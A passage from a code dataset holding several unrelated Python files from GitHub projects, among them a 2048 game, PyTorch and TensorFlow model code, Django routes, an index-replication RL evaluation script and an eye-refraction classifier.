\"\n\n return ret\n\nif __name__ == '__main__':\n app.run()","repo_name":"dattnguyen82/DreamJiuJitsu","sub_path":"dream_rank.py","file_name":"dream_rank.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1956574833","text":"import tensorflow as tf\n\n\nclass Network(object):\n\n def weight_variable(self, shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n def bias_variable(self, shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n def nn_layer(self, input_tensor, input_dim, output_dim, layer_name, act=tf.nn.relu):\n\n with tf.name_scope(layer_name):\n\n with tf.name_scope('weights'):\n weights = self.weight_variable([input_dim, output_dim])\n\n with tf.name_scope('biases'):\n biases = self.bias_variable([output_dim])\n\n with tf.name_scope('Wx_plus_b'):\n preactivate = tf.matmul(input_tensor, weights) + biases\n activations = act(preactivate, name='activation')\n\n return activations\n\n def feed_dict(self, dropout, keep_prob, mnist, train, x, y_):\n\n if train:\n xs, ys = mnist.train.next_batch(100)\n k = dropout\n else:\n xs, ys = mnist.test.images, mnist.test.labels\n k = 1.0\n\n return {x: xs, y_: ys, keep_prob: k}\n","repo_name":"shree6791/Deep-Learning","sub_path":"ANN/src/model/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"331247247","text":"import os\nimport numpy as np\n\nN=1000\nfor i in np.arange(0,151,4):\n for j in range(N):\n try:\n os.remove('lc'+str(i)+'_'+str(j))\n except:\n continue\n","repo_name":"Lace-t/DRW-measurement","sub_path":"kDRW/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5354187404","text":"#!/bin/python3\n\nfrom random import choice\nfrom Tile import *\n\n# store_data = False\nscreen = turtle.Screen()\n\ni = 2\nwhile i < 5000:\n screen.addshape(str(i)+\".gif\")\n i*=2\n\nbox_size = 64\n\ngrid = [[None for x in range(0,4)] for y in range(0,4)]\n\ndef get(x, y):\n if grid[x][y] == None:\n return 0\n return grid[x][y].value\n\ndef score():\n sum = 0\n for x in range(0,4):\n for y in range(0,4):\n sum += get(x,y)\n return sum\n\ndef can_go_down():\n for x in range(0,4):\n for y1 in range(0,4):\n for y2 in range(y1-1,-1,-1):\n if grid[x][y1] != None and grid[x][y2] == None:\n return True\n return vertical_merges()\n\ndef can_go_up():\n for x in range(0,4):\n for y1 in range(3,-1,-1):\n for y2 in range(y1+1,4):\n if grid[x][y1] != None and grid[x][y2] == None:\n return True\n return vertical_merges()\n\ndef can_go_left():\n for y in range(0,4):\n for x1 in range(0,4):\n for x2 in range(x1-1,-1,-1):\n if grid[x1][y] != None and grid[x2][y] == None:\n return True\n return horizontal_merges()\n \ndef can_go_right():\n for y in range(0,4):\n for x1 in range(3,-1,-1):\n for x2 in range(x1+1,4):\n if grid[x1][y] != None and grid[x2][y] == None:\n return True\n return horizontal_merges()\n\n \ndef vertical_merges():\n for x in range(0,4):\n for y in range(1,4):\n if grid[x][y] != None and grid[x][y-1] != None and grid[x][y].value == grid[x][y-1].value:\n return True\n return False\n\ndef horizontal_merges():\n for x in range(1,4):\n for y in range(0,4):\n if grid[x][y] != None and grid[x-1][y] != None and grid[x][y].value == grid[x-1][y].value:\n return True\n return False\n\ndef draw_box(x, y):\n turtle.penup()\n turtle.setposition(x*box_size, y*box_size)\n turtle.pendown()\n turtle.setposition((x+1)*box_size, y*box_size)\n turtle.setposition((x+1)*box_size, (y+1)*box_size)\n turtle.setposition(x*box_size, (y+1)*box_size)\n turtle.setposition(x*box_size, y*box_size)\n turtle.penup()\n \ndef add_tile(x, y):\n if grid[x][y] == None:\n # num = choice([2,2,2,2,4,2,2,2,2,2])\n num = 2\n grid[x][y] = Tile(x,y,num)\n return grid[x][y]\n \ndef add_random_tile():\n options = []\n for x in range(0,4):\n for y in range(0,4):\n if grid[x][y] == None:\n options.append((x,y))\n \n x,y = choice(options)\n add_tile(x,y)\n\ndef refresh():\n for x in range(0,4):\n for y in range(0,4):\n if grid[x][y] != None:\n grid[x][y].refresh(x,y)\n \n if not (can_go_down() or can_go_left() or can_go_right() or can_go_up()):\n print(\"Game Over! Score:\", score())\n\n# def store_data():\n# new_line=True\n# f = open(\"dataset.txt\",\"r\")\n# if f==\"\":\n# new_line=False\n# f.close()\n# f = open(\"dataset.txt\",\"a\")\n# if new_line==True:\n# f.write(\"\\n\")\n \ndef down():\n if not can_go_down():\n return\n shift(0,-1)\n merge(0,-1)\n shift(0,-1)\n add_random_tile()\n refresh()\n\ndef up():\n if not can_go_up():\n return\n shift(0,1)\n merge(0,1)\n shift(0,1)\n add_random_tile()\n refresh()\n \ndef right():\n if not can_go_right():\n return\n shift(1,0)\n merge(1,0)\n shift(1,0)\n add_random_tile()\n refresh()\n \ndef left():\n if not can_go_left():\n return\n shift(-1,0)\n merge(-1,0)\n shift(-1,0)\n add_random_tile()\n refresh()\n \ndef shift(i, j):\n if i + j < 0:\n xrange = range(-i,4)\n yrange = range(-j,4)\n else:\n xrange = range(3-i,-1,-1)\n yrange = range(3-j,-1,-1)\n \n for x in xrange:\n for y in yrange:\n x1 = x\n y1 = y\n while 0 <= x1+i <= 3 and 0 <= y1+j <= 3 and grid[x1+i][y1+j] == None:\n grid[x1+i][y1+j] = grid[x1][y1]\n grid[x1][y1] = None\n x1 += i\n y1 += j\n \ndef merge(i, j):\n if i + j < 0:\n xrange = range(-i,4)\n yrange = range(-j,4)\n else:\n xrange = range(3-i,-1,-1)\n yrange = range(3-j,-1,-1)\n \n for x in xrange:\n for y in yrange:\n if grid[x][y] != None and grid[x+i][y+j] != None and grid[x+i][y+j].merge(grid[x][y]):\n grid[x][y].turtle.ht()\n grid[x][y] = None\n \ndef setup():\n screen.onkey(up,\"w\")\n screen.onkey(left,\"a\")\n screen.onkey(down,\"s\")\n screen.onkey(right,\"d\")\n clear_board()\n add_random_tile()\n add_random_tile()\n screen.listen()\n screen.delay(7)\n \n\ndef unsetup():\n screen.onkey(None,\"w\")\n screen.onkey(None,\"a\")\n screen.onkey(None,\"s\")\n screen.onkey(None,\"d\")\n\ndef clear_board():\n for i in range(4):\n for n in range(4):\n if grid[i][n]!=None:\n grid[i][n].turtle.ht()\n grid[i][n] = None\n","repo_name":"Death-by-pip/2048-AI-mediocre","sub_path":"Helpers.py","file_name":"Helpers.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9007406550","text":"import argparse\nimport os\nimport sys\nimport numpy as np\nimport torch\n\nfrom environments.index_environment import Env\nfrom utils.utils import get_device, read_config_file\nfrom utils.utils_graphs import plot_returns, plot_values\n\nfrom agents.particle_filter import ParticleFilter\nfrom agents.actor_critic import ActorCritic\nfrom agents.ppo import PPO\nfrom agents.reinforce import reinforce_agent\n\n\nparser = argparse.ArgumentParser(description='Parser to run best models')\nparser.add_argument('--save_dir', type=str, default='./figs/',\n help='location where figures will be saved')\nparser.add_argument('--config_path', type=str, default='./config.json',\n help='location where config file is')\nparser.add_argument('--experience', type=int, default=0,\n help='experience of environment')\nparser.add_argument('--n_tests', type=int, default=100,\n help='number of tests to compute TEs')\nparser.add_argument('--seed', type=int, default=1111,\n help='random seed')\n\nargs = parser.parse_args()\nargsdict = args.__dict__\nargsdict['code_file'] = sys.argv[0]\n\n# Use the flags passed to the script to make the\n# name for the experimental directory\nprint(\"\\n########## Setting Up Experiment{} ##########\".format(args.experience))\nflags = [flag.lstrip('--').replace('/', '').replace('\\\\', '') for flag in sys.argv[1:]]\n\nexperiment_path = os.path.join(args.save_dir+'_'.join([str(argsdict['experience']),\n str(argsdict['seed']), '/']))\n\nprint('Figures will be saved in: {}'.format(experiment_path))\nif not os.path.exists(experiment_path):\n os.mkdir(experiment_path)\n\n# Increment a counter so that previous results with the same args will not\n# be overwritten. Comment out the next four lines if you only want to keep\n# the most recent results.\ni = 0\nwhile os.path.exists(experiment_path + \"_\" + str(i)):\n i += 1\nexperiment_path = experiment_path + \"_\" + str(i)\n\n# Set experiment\nconfig = read_config_file(args.config_path)\nenv = Env(data_path='./data/returns.csv', context='test', experiment=args.experience)\ndevice = get_device()\n\n# set seed for entire run and instanciate models\ntorch.manual_seed(args.seed)\nnp.random.seed(args.seed)\n\n# Particle filter\nparams_pf = config[\"PF\"]\nparticle_filter_agent = ParticleFilter(n_particles=params_pf[\"n_particles\"], n_assets=env.n_assets,\n vol=params_pf[\"vol\"], likeli_scale=params_pf[\"likeli_scale\"])\n\n# A2C\nparams_ac = config[\"A2C\"]\nagent_ac = ActorCritic(params_ac[\"n_episodes\"], params_ac[\"gamma\"], params_ac[\"lr_valf\"],\n params_ac[\"lr_pol\"], params_ac[\"n_hidden_valf\"], params_ac[\"n_hidden_pol\"])\n\n# PPO\nparams_ppo = config[\"PPO\"]\nagent_ppo = PPO(env.n_states, env.n_assets, params_ppo[\"hyperparams\"]).float().to(device)\n\n# REINFORCE\nparams_re = config['RE']\nagent_reinforce = reinforce_agent(params_re['hyperparams'], env)\n\n\n# main loop for figures\nn_figs = 3\n\nfor start in range(n_figs):\n\n # use same start/period\n start = int(np.random.uniform(0, env.history_len-env.T))\n\n # compute predictions\n _, _, returns_pf, values_pf = particle_filter_agent.learn(env, start)\n _, returns_ac, values_ac = \\\n agent_ac.predict(env, start, pred_id='_ac' + str(start), model_path=params_ac[\"best_model_path\"])\n _, returns_ppo, values_ppo = \\\n agent_ppo.predict(env, start, pred_id='_ppo' + str(start), model_path=params_ppo[\"best_model_path\"])\n _, returns_re, values_re = \\\n agent_reinforce.predict(env, start, pred_id='_re' + str(start), model_path=params_re[\"best_model_path\"])\n\n # plot graphs\n returns_path = experiment_path + '_returns_all_' + str(start) + '.png'\n values_path = experiment_path + '_values_all_' + str(start) + '.png'\n\n plot_returns(env, returns_pf, returns_ac, returns_ppo, returns_re, returns_path)\n plot_values(env, values_pf, values_ac, values_ppo, values_re, values_path)\n\nprint('Done plotting figures!')\n\n# main loop to compute average TE's\n\nTE_PF = []\nTE_PPO = []\nTE_AC = []\nTE_RE = []\n\nfor i in range(args.n_tests):\n\n start = int(np.random.uniform(0, env.history_len-env.T))\n\n # compute predictions\n te_pf, _, _, _ = particle_filter_agent.learn(env, start)\n te_ac, _, _ = \\\n agent_ac.predict(env, start, pred_id='_ac' + str(start), model_path=params_ac[\"best_model_path\"])\n te_ppo, _, _ = \\\n agent_ppo.predict(env, start, pred_id='_ac' + str(start), model_path=params_ppo[\"best_model_path\"])\n te_re, _, _ = \\\n agent_reinforce.predict(env, start, pred_id='_ac' + str(start), model_path=params_re[\"best_model_path\"])\n\n # append values\n TE_PF.append(te_pf)\n TE_AC.append(te_ac)\n TE_PPO.append(te_ppo)\n TE_RE.append(te_re)\n\n\nprint('mean Tracking Error for PF: ', round(np.array(TE_PF).mean()*100000, 4))\nprint('mean Tracking Error for A2C: ', round(np.array(TE_AC).mean()*100000, 4))\nprint('mean Tracking Error for PPO: ', round(np.array(TE_PPO).mean()*100000, 4))\nprint('mean Tracking Error for REINFORCE: ', round(np.array(TE_RE).mean()*100000, 4))\n\n","repo_name":"memalette/IndexReplicator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5101,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"34978299298","text":"from django.contrib import admin\r\nfrom django.urls import include, path\r\nfrom . import views\r\nfrom .views import LoginView, LogoutView\r\n\r\n\r\n# defining my url patterns here\r\nurlpatterns = [\r\n path('admin/', admin.site.urls),\r\n\r\n path('api/v1/web_app/auth/login/', LoginView.as_view()),\r\n path('api/v1/web_app/auth/logout/', LogoutView.as_view()),\r\n\r\n path('api/v1/web_app/users/', views.ListUsers.as_view()),\r\n path('api/v1/web_app/users//', views.DetailUsers.as_view()),\r\n\r\n path('api/v1/get_all_stations/', views.get_all_stations),\r\n path('api/v1/get_stations_near_to_me/', views.get_nearer_stations),\r\n path('api/v1/get_stations_near_to_a_location/', views.get_stations_near_to_a_location),\r\n\r\n]\r\n","repo_name":"rfdmeshkath/web_map","sub_path":"wmap_back_end/web_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35362813277","text":"from __future__ import division\nimport os\nimport numpy as np\n#from scipy.ndimage import imread\nfrom imageio import imread\n\nimport torch\nimport torch.utils.data as data\n\nfrom datasets import pms_transforms\nfrom . import util\nnp.random.seed(0)\n\nclass UPS_Synth_Dataset(data.Dataset):\n def __init__(self, args, root, split='train'):\n self.root = os.path.join(root)\n self.split = split\n self.args = args\n self.shape_list = util.readList(os.path.join(self.root, split + args.l_suffix))\n\n def _getInputPath(self, index):\n shape, mtrl = self.shape_list[index].split('/')\n normal_path = os.path.join(self.root, 'Images', shape, shape + '_normal.png')\n img_dir = os.path.join(self.root, 'Images', self.shape_list[index])\n img_list = util.readList(os.path.join(img_dir, '%s_%s.txt' % (shape, mtrl)))\n\n data = np.genfromtxt(img_list, dtype='str', delimiter=' ')\n select_idx = np.random.permutation(data.shape[0])[:self.args.in_img_num]\n idxs = ['%03d' % (idx) for idx in select_idx]\n data = data[select_idx, :]\n imgs = [os.path.join(img_dir, img) for img in data[:, 0]]\n dirs = data[:, 1:4].astype(np.float32)\n return normal_path, imgs, dirs\n\n def __getitem__(self, index):\n normal_path, img_list, dirs = self._getInputPath(index)\n normal = imread(normal_path).astype(np.float32) / 255.0 * 2 - 1\n imgs = []\n for i in img_list:\n img = imread(i).astype(np.float32) / 255.0\n imgs.append(img)\n img = np.concatenate(imgs, 2)\n\n h, w, c = img.shape\n crop_h, crop_w = self.args.crop_h, self.args.crop_w\n if self.args.rescale and not (crop_h == h):\n sc_h = np.random.randint(crop_h, h) if self.args.rand_sc else self.args.scale_h\n sc_w = np.random.randint(crop_w, w) if self.args.rand_sc else self.args.scale_w\n img, normal = pms_transforms.rescale(img, normal, [sc_h, sc_w])\n\n if self.args.crop:\n img, normal = pms_transforms.randomCrop(img, normal, [crop_h, crop_w])\n\n if self.args.color_aug:\n img = img * np.random.uniform(1, self.args.color_ratio)\n\n if self.args.int_aug:\n ints = pms_transforms.getIntensity(len(imgs))\n img = np.dot(img, np.diag(ints.reshape(-1)))\n else:\n ints = np.ones(c)\n\n if self.args.noise_aug:\n img = pms_transforms.randomNoiseAug(img, self.args.noise)\n\n mask = pms_transforms.normalToMask(normal)\n normal = normal * mask.repeat(3, 2) \n norm = np.sqrt((normal * normal).sum(2, keepdims=True))\n normal = normal / (norm + 1e-10) # Rescale normal to unit length\n\n item = {'normal': normal, 'img': img, 'mask': mask}\n for k in item.keys(): \n item[k] = pms_transforms.arrayToTensor(item[k])\n\n item['dirs'] = torch.from_numpy(dirs).view(-1, 1, 1).float()\n item['ints'] = torch.from_numpy(ints).view(-1, 1, 1).float()\n return item\n\n def __len__(self):\n return len(self.shape_list)\n","repo_name":"guanyingc/SDPS-Net","sub_path":"datasets/UPS_Synth_Dataset.py","file_name":"UPS_Synth_Dataset.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"3"} +{"seq_id":"23843579525","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n Created on Tue Jan 28 15:12:02 2020\n @description: This class is a framework to run the Random Forest (RF) classifier in the task of classification of\n vx130 measurements. This class is able to form three differnt predictions:\n 1. predict the spherical equivalent delta set: |Delta|<=delta and |Delta|>delta sets, where Delta is a threshold of the spherical equivalent delta.\n 2. predict the delta between the objective and subjective sphere and cylinder, and\n 3. directly predict the subjective sphere and cylinder based on objective vx measurements.\n @author: ofir shukron\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import RandomizedSearchCV, GridSearchCV\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.impute import KNNImputer\nfrom sklearn import preprocessing\nimport sklearn.feature_selection\nfrom scipy import stats\nfrom scipy.ndimage import median_filter\nimport itertools\nimport pickle\n# import matplotlib\nfrom autorefeyelib.Refraction import vx120Transformer\nfrom autorefeyelib.Refraction import vx120Imputer\n\nclass Classifier:\n \"\"\"\n A framework for the classification of VX -EMR combined data\n into a set with |Delta|<=delta using several test classifiers\n where Delta is either the spherical equivalent, sphere or cylinder\n delta between objective and subjective refraction\n \"\"\"\n def __init__(self):\n print(\"INITIALIZING\")\n self.data = pd.DataFrame()\n self.Left = pd.DataFrame()\n self.Right = pd.DataFrame()\n self.dataParsed = False\n self.dataLoaded = False\n self.sphModel = None # sphere clasifier\n self.cylModel = None # cylinder classifier\n self.vertexDistance = -0.012\n self.transformer = vx120Transformer.Transformer()\n # features below are for either left or right eye, where an underscore _Left, or _Right, appears in the data set.\n # some featues are computed directly from the parser vxParser.\n # All featues are from the VX120/130. The subjective refraction is from the EMR.\n # featureList is a dictionary with keys as feature names and values as their ranges\n # TODO: move features and ranges to xml or json file\n self.featureList = {\n 'Age':[15,100],\n 'Gender':[],\n 'Topo_Sim_K_K1':[], # K1\n 'Topo_Sim_K_K2':[], # K2\n 'WF_SPHERE_R_3':[-5,6], # sphere\n 'WF_CYLINDER_R_3':[-6,0], # cylinder\n 'WF_AXIS_R_3':[], # Axis (radians)\n 'WF_RT_Fv_Zernike_Photo_di_Z_2_-2':[-1,1], # astigmatism\n 'WF_RT_Fv_Zernike_Photo_di_Z_4_0':[-0.2,0.2], # spherical aberration\n 'WF_RT_Fv_Zernike_Photo_di_Z_3_1':[-0.3,0.3], # primary coma photo\n 'WF_RT_Fv_Meso_PupilRadius':[], # pupil radius\n 'WF_RT_Fv_Zernike_Meso_di_Z_2_-2':[-2,2], # astigmatism\n 'WF_RT_Fv_Zernike_Meso_di_Z_4_0':[-0.3, 0.3], # spherical abberation diopter\n 'WF_RT_Fv_Zernike_Meso_di_Z_3_1':[-0.4,0.4], # primary coma meso\n 'Pachy_MEASURE_Acd':[1,5], # anterior chamber depth\n 'Pachy_MEASURE_WhiteToWhite':[8,16], # white to white\n 'Pachy_MEASURE_KappaAngle':[0,25], # kappa angle\n 'Pachy_MEASURE_Thickness':[400,600], # pachimetry\n 'Tono_MEASURE_Average':[], # tonometry\n 'Topo_KERATOCONUS_Kpi':[], # keratoconus index\n 'AnteriorChamberVol':[], # computed\n 'AcdToPupilRadius_Ratio':[], # computed\n 'PupilRadiusToW2W_Ratio':[], # computed\n 'Topo_GENERAL_Geo_Q':[],\n 'kRatio':[], # computed\n 'J0_3':[], # computed\n 'J45_3':[], # computed\n 'BlurStrength_3':[]} # computed\n\n # self.featureList = np.asanyarray(self.featureList)\n\n def Load(self,fileName):\n \"\"\"\n Load a joint VX-EMR database\n\n Parameters:\n -----------\n fileName: str\n a full path to a csv EMR-VX120 joint database\n \"\"\"\n if not fileName.__class__==str:\n raise ValueError('fileName must be a string. Got {fileName.__class__}')\n\n with open(fileName) as csvFile:\n self.data = pd.read_csv(csvFile,low_memory=False)\n self.dataLoaded = True\n self.dataParsed = False\n\n self.Left = pd.DataFrame()\n self.Right = pd.DataFrame()\n self.Both = pd.DataFrame()\n\n def GetCumulativeDelta(self,target='se',bins=np.arange(0,2,0.25)):\n \"\"\"\n Compute the cumulative proportion of the delta being lower than d, where d\n an increasing value in jumps of 0.25 diopters\n\n Parameters:\n ------------\n target : {'se,'sphere','cylinder','glassesSphere','glassesCylinder'}, default='se'\n 'se'- for the spherical equivalent delta\n 'cylinderDelta' - for the cylinder delta\n 'sphereDelta' - for the spherical equivalent delta\n 'glassesSphere' - for the current glasses sphere delta\n 'glassesCylinder' - for the current glasses cylinder delta\n\n Output:\n --------\n res - a table of cumulative percentages from the current data and current target below delta, as defined by the bins\n for left right and both eyes\n \"\"\"\n if np.isin(target.lower(),['se','sphericalequivalent']):\n t = 'SphericalEqDelta'\n elif target.lower() =='cylinder':\n t = 'CylinderDelta'\n elif target.lower()=='sphere':\n t = 'SphereDelta'\n elif target.lower()=='glassessphere':\n t = 'GlassesSphereDelta'\n elif target.lower()=='glassescylinder':\n t = 'GlassesCylinderDelta'\n else:\n raise Exception('option {} is not supported'.format(target))\n res = pd.DataFrame()\n lInds = np.where(pd.isnull(self.Left[t])==False)[0]\n rInds = np.where(pd.isnull(self.Right[t])==False)[0]\n bInds = np.where(pd.isnull(self.Both[t])==False)[0]\n for sIdx in range(len(bins)):\n res.loc[sIdx,target+'_delta'] = bins[sIdx]\n res.loc[sIdx,'Left'] = len(np.where(np.abs(self.Left.loc[self.Left.index[lInds],t])<=bins[sIdx])[0])/len(lInds)\n res.loc[sIdx,'Right'] = len(np.where(np.abs(self.Right.loc[self.Right.index[rInds],t])<=bins[sIdx])[0])/len(rInds)\n res.loc[sIdx,'Both'] = len(np.where(np.abs(self.Both.loc[self.Both.index[bInds],t])<=bins[sIdx])[0])/len(self.Both)\n return res\n\n def GetTrainingAndValidationIndices(self,labels,trainProp=0.8,equalizeTrainingClasses=False):\n \"\"\"\n Assign indices randomly into training and testing data\n return nonoverlapping training, testing fully covering numCases: len(training)+len(testing) = numCases\n Parameters:\n -------------\n labels - vector\n a binary label vectors with one label per observation\n trainProp, float, defaul=0.8\n proportion of observations assigned for training out of the total. the reminder is labeled for testing\n equalizeTrainingClasses : bool, default=False\n make equal the proportion of each class in the training set\n Output:\n -------\n training : vector\n indices of training set\n testing : vector\n indices of testing set\n \"\"\"\n numCases = len(labels)\n assert((trainProp<1.0)&(trainProp>0.0))\n numTraining = np.round(trainProp*numCases).astype(np.int)\n rp = np.random.permutation(numCases)\n training = rp[:numTraining]\n testing = rp[numTraining:]\n\n if equalizeTrainingClasses:\n # indices for each class\n n0 = training[np.where(labels[training]==0)[0]]\n n1 = training[np.where(labels[training]==1)[0]]\n if len(n0)>=len(n1):\n n0 = n0[:len(n1)] # truncate no to match length of n1\n else:\n n1 = n1[:len(n0)] # truncate n1 to match length of n0\n training = np.append(n0,n1)\n\n return training, testing\n\n def Parse(self,handleMissing='impute',imputeMethod='univariate',nNeighbors=2,weights='distance',vertexDistance=0.012):\n \"\"\"\n Parse a merged (joint) db of the vx120 and its matched EMR entries\n\n\n Parameters:\n -----------\n handleMissing: {'discard','impute'}, str, default='impute\n either discard rows with missing data or impute, fill in missing with mean columnd values\n univariate: {True, False}, bool, default=True\n for handleMissing='impute', either univariate imputation based on column values\n or multivariate, based on the whole feature matrix\n \"\"\"\n if not self.dataParsed:\n\n # impute missing values using the median\n self.data = self.data.fillna(self.data.median(axis=0))\n print('[Classifier] imputing missing values')\n\n self.data = self.transformer.Transform(self.data)\n print('[Classifier] Transforming data')\n\n # computing additional features\n for eIdx in ['_Left','_Right']:\n # ACD to pupil radius\n self.data[f'AcdToPupilRadius_Ratio{eIdx}'] = 0.5*self.data[f'Pachy_MEASURE_Acd{eIdx}']\\\n /self.data[f'WF_RT_Fv_Meso_PupilRadius{eIdx}']\n # pupil radius to wtw ratio\n self.data[f'PupilRadiusToW2W_Ratio{eIdx}'] = 2*self.data[f'WF_RT_Fv_Meso_PupilRadius{eIdx}']\\\n /self.data[f'Pachy_MEASURE_WhiteToWhite{eIdx}']\n self.data[f'kRatio{eIdx}'] = self.data[f'Topo_Sim_K_K1{eIdx}']/self.data[f'Topo_Sim_K_K2{eIdx}']\n\n # divide the data to Left and Right according to the featureList\n for fIdx in self.featureList.keys():\n if fIdx+'_Left' in self.data.keys():\n self.Left.loc[:,fIdx] = self.data[fIdx+'_Left']\n if fIdx+'_Right' in self.data.keys():\n self.Right.loc[:,fIdx] = self.data[fIdx+'_Right']\n if fIdx in self.data.keys():\n self.Left.loc[:,fIdx] = self.data[fIdx]\n self.Right.loc[:,fIdx] = self.data[fIdx]\n print('[Classifier] dividing data to Left and Right eye')\n\n # Add subjective values to Left and Right databases\n self.Left['EMR:VisualAcuitySphere'] = self.data['EMR:VisualAcuitySphere_Left'].apply(self.transformer.Round)\n self.Left['EMR:VisualAcuityCylinder'] = self.data['EMR:VisualAcuityCylinder_Left'].apply(self.transformer.Round)\n self.Left['EMR:VisualAcuityAxis'] = self.data['EMR:VisualAcuityAxis_Left'].apply(self.transformer.Round,args=[1])\n self.Right['EMR:VisualAcuitySphere'] = self.data['EMR:VisualAcuitySphere_Right'].apply(self.transformer.Round)\n self.Right['EMR:VisualAcuityCylinder'] = self.data['EMR:VisualAcuityCylinder_Right'].apply(self.transformer.Round)\n self.Right['EMR:VisualAcuityAxis'] = self.data['EMR:VisualAcuityAxis_Right'].apply(self.transformer.Round,args=[1])\n\n # Compute cylinder delta (objective-subjective)\n self.Left['CylinderDelta'] = (self.Left['WF_CYLINDER_R_3'] -\n self.Left['EMR:VisualAcuityCylinder'])\n self.Right['CylinderDelta'] = (self.Right['WF_CYLINDER_R_3'] -\n self.Right['EMR:VisualAcuityCylinder'])\n\n # Compute sphere delta\n self.Left['SphereDelta'] = (self.Left['WF_SPHERE_R_3'] -\n self.Left['EMR:VisualAcuitySphere'])\n self.Right['SphereDelta'] = (self.Right['WF_SPHERE_R_3'] -\n self.Right['EMR:VisualAcuitySphere'])\n\n # compute spherical equivalent\n self.Left['ObjectiveSphericalEquivalent'] = (self.Left['WF_SPHERE_R_3']+\n self.Left['WF_CYLINDER_R_3']/2)\n self.Left['SubjectiveSphericalEquivalent'] = (self.Left['EMR:VisualAcuitySphere'] +\n self.Left['EMR:VisualAcuityCylinder']/2)\n self.Right['ObjectiveSphericalEquivalent'] = (self.Right['WF_SPHERE_R_3']+\n self.Right['WF_CYLINDER_R_3']/2)\n self.Right['SubjectiveSphericalEquivalent'] = (self.Right['EMR:VisualAcuitySphere'] +\n self.Right['EMR:VisualAcuityCylinder']/2)\n\n # Compute spherical equivalent delta\n self.Left['SphericalEqDelta'] = (self.Left['ObjectiveSphericalEquivalent'] -\n self.Left['SubjectiveSphericalEquivalent'])\n self.Right['SphericalEqDelta'] = (self.Right['ObjectiveSphericalEquivalent'] -\n self.Right['SubjectiveSphericalEquivalent'])\n\n # Filter out features outside the input ranges\n validIndsL = np.ones(shape=len(self.Left),dtype=np.bool)\n validIndsR = np.ones(shape=len(self.Right),dtype=np.bool)\n for dk,dv in self.featureList.items():\n if len(dv)>0:\n newIndsL = (self.Left[dk]<=np.max(dv))&(self.Left[dk]>=np.min(dv))\n newIndsR = (self.Right[dk]<=np.max(dv))&(self.Right[dk]>=np.min(dv))\n # print(f'{dk} numValidL: {newIndsL.sum()}')\n # print(f'{dk} numValidR: {newIndsR.sum()}')\n validIndsL = validIndsL&newIndsL\n validIndsR = validIndsR&newIndsR\n self.Left = self.Left.loc[validIndsL]\n self.Right = self.Right.loc[validIndsR]\n\n # Rearrange indices =\n self.Left.index = range(len(self.Left))\n self.Right.index = range(len(self.Right))\n\n # Append for Both eyes\n self.Both = self.Left.append(self.Right)\n # Rearrange the indices for Both\n self.Both.index = range(len(self.Both))\n\n self.dataParsed = True\n\n def GetLabelsFromDeltas(self,data,classes,groupEndBins=True):\n '''\n assign laels to the data in data according to classes in classes\n Parameters:\n ----------\n data\n '''\n labels = data.apply(self._AssignLabel,args=[classes,groupEndBins]).to_frame()\n labels.index = data.index\n return labels\n\n def GetClasses(self,data,predict='correction',target='se',\n delta=0.25,sphereDelta=None,cylinderDelta=None,groupEndBins=False,discardUnlabeled=False):\n \"\"\"\n Get labels for eyes based on the Delta set.\n\n Parameters:\n -----------\n predict: {'deltaSet','correction'},str\n labels for the prediction of delta-set or correction\n target : {'seDelta', 'cylinderDelta', 'sphereDelta' }, default='seDelta\n the Delta set\n eye : {'right', 'left','both' } , default='both'\n data to use\n delta : float, default=0.25\n a positive sclar defining the Delta set by |Delta|<=delta\n groupEndBins: bool, default=False\n observations lower/higher than min/max(cylinderDelta) or min/max(sphereDelta) are assigned end class labels\n discardUnlabeled: bool, default=False\n if set to True observation with labels not matching any of the vlaued of cylinder or sphereDelta are discarded\n otherwise, unlabeled observations are grouped and assigned the integer label numClasses+1\n\n Output:\n ---------\n classes :\n for predict='deltaset'\n a binary vector the same size as self.target with 1 for |Delta|<=delta , 0 otherwise\n for predict = 'correction'\n a vector of integer classes indicating the correction from objective to subjective\n the class number correspond to the correction needed in the array of sphDelta or cylDelta\n \"\"\"\n\n if self.dataParsed:\n # data = self.GetData(eye=eye)\n if predict.lower()=='deltaset':\n if target.lower()=='se':\n classes = np.where(np.abs(data['SphericalEqDelta'])<=delta,1,0)\n elif target.lower()=='cylinder':\n classes = np.where(np.abs(data['CylinderDelta'])<=delta,1,0)\n elif target.lower()=='sphere':\n classes = np.where(np.abs(data['SphereDelta'])<=delta,1,0)\n else:\n raise Exception('Option {} is not supported'.format(target))\n\n elif predict.lower()=='correction':\n classes = np.zeros(len(data),dtype=np.int)\n if target.lower()=='cylinderdelta':\n numClasses = len(cylinderDelta)\n if cylinderDelta==None:\n raise Exception('cylinderDelta bins must be defined')\n for lIdx in range(len(data)):\n try:\n if groupEndBins:\n if data.loc[data.index[lIdx],'CylinderDelta']np.max(cylinderDelta):\n classes[lIdx] = numClasses-1\n else:\n classes[lIdx] = cylinderDelta.index(data.loc[data.index[lIdx],'CylinderDelta'])\n else:\n classes[lIdx] = cylinderDelta.index(data.loc[data.index[lIdx],'CylinderDelta'])\n except:\n # classes[lIdx] = numClasses\n classes[lIdx] = -1\n elif target.lower()=='cylinder':\n numClasses =len(cylinderDelta)\n if 